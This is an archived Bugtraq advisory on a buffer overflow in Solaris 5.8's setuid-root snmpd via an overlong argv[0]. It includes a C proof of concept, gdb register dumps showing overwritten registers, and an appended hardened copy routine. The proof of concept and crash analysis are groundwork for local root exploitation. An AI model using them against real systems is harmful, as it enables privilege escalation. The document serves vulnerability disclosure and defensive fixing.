Bugtraq mailing list archives
Solaris 5.8 snmpd Vulnerability
From: Pablo Sor <psor () AFIP GOV AR>
Date: Tue, 13 Mar 2001 07:34:40 -0400
Description

The /opt/SUNWssp/snmpd command (SNMP proxy agent) is suid root and contains a buffer overflow. The problem occurs when it copies its own name (argv[0]) to an internal variable without checking its length, and this causes the overflow.

Vulnerable Version

Sun Solaris 5.8

Technical Description

-----------------------------------------------------
#include <stdio.h>
#include <stdlib.h>   /* malloc, atoi */
#include <string.h>   /* memset */
#include <unistd.h>   /* execl */

int main(int argc,char **argv)
{
  char *buf;

  /* argv[1] = length of the argv[0] string handed to snmpd */
  buf = (char *) malloc(atoi(argv[1])*sizeof(char));
  memset(buf,0x41,atoi(argv[1])-1);
  buf[atoi(argv[1])-1]=0;
  execl("/opt/SUNWssp/bin/snmpd",buf,(char *)0);
  return 1;  /* reached only if execl fails */
}
-----------------------------------------------------

$ uname -a
SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
$ ./snmpd-demo 700
Segmentation Fault (core dumped)
$ gdb ./snmpd-demo --core=core
[..]
Program received signal SIGSEGV, Segmentation fault.
0xfee32b58 in strcpy () from /usr/lib/libc.so.1
(gdb) info registers
g0             0x0              0
g1             0x78000          491520
g2             0xff22579c       -14526564
g3             0xff162d78       -15323784
g4             0x0              0
g5             0x0              0
g6             0x0              0
g7             0x76f98          487320
o0             0x2c1            705
o1             0xffbed9b9       -4269639
o2             0x2c1            705
o3             0x41             65
o4             0xffbed180       -4271744
o5             0xff26a147       -14245561
sp             0xffbed658       -4270504
o7             0xfee83650       -18336176
l0             0x7efefeff       2130640639
l1             0x81010100       -2130640640
l2             0xff000000       -16777216
l3             0xff0000         16711680
l4             0xff00           65280
l5             0x0              0
l6             0x0              0
l7             0x0              0
i0             0x41414141       1094795585   ;;;;;
i1             0xffbed6fc       -4270340     ; pointer to argv[0]
i2             0x41414141       1094795585   ;;;;;
i3             0x41414141       1094795585   ;;;;;
i4             0x81010100       -2130640640
i5             0xff00           65280
fp             0xffbed698       -4270440
i7             0xff265474       -14265228
y              0x6              6
psr            0xfe001000       -33550336
wim            0x0              0
tbr            0x0              0
pc             0xfee32b58       -18666664
npc            0xfee32b5c       -18666660
fpsr           0x0              0
cpsr           0x0              0
(gdb) x/20x $i1
0xffbed6fc:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbed70c:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbed71c:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbed72c:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbed73c:     0x41414141      0x41414141      0x41414141      0x41414141

Pablo Sor
psor () afip gov ar
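
Added example, not part of the original post and not Sun's code: a bounded replacement for the unchecked strcpy() of argv[0] that the post describes, which rejects a missing or oversized name instead of copying it. The function name set_progname and the 64-byte buffer size are assumptions for illustration; the post does not give the real buffer size.

```c
#include <stdio.h>
#include <string.h>

#define PROGNAME_MAX 64  /* assumed size; the real snmpd buffer size is not in the post */

/* Hardened copy of argv[0]. Returns 0 on success, -1 if the name is
 * missing, empty, or does not fit. Never writes past dst[dstlen - 1]. */
int set_progname(char *dst, size_t dstlen, const char *argv0)
{
    const char *base;
    size_t len;

    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (argv0 == NULL)              /* exec*() callers control argv[0], or may omit it */
        return -1;

    base = strrchr(argv0, '/');     /* keep only the final path component */
    base = (base != NULL) ? base + 1 : argv0;

    len = strlen(base);
    if (len == 0 || len >= dstlen)  /* reject rather than silently truncate */
        return -1;

    memcpy(dst, base, len + 1);     /* len + 1 <= dstlen, so the NUL fits */
    return 0;
}

int main(int argc, char **argv)
{
    char progname[PROGNAME_MAX];

    /* The pattern described in the post is: strcpy(progname, argv[0]); */
    if (set_progname(progname, sizeof progname, argc > 0 ? argv[0] : NULL) != 0) {
        fprintf(stderr, "refusing to start: invalid argv[0]\n");
        return 1;
    }
    printf("progname=%s\n", progname);
    return 0;
}
```

For a set-uid binary the check belongs before any other use of argv[0], since the caller of execl() chooses that string freely.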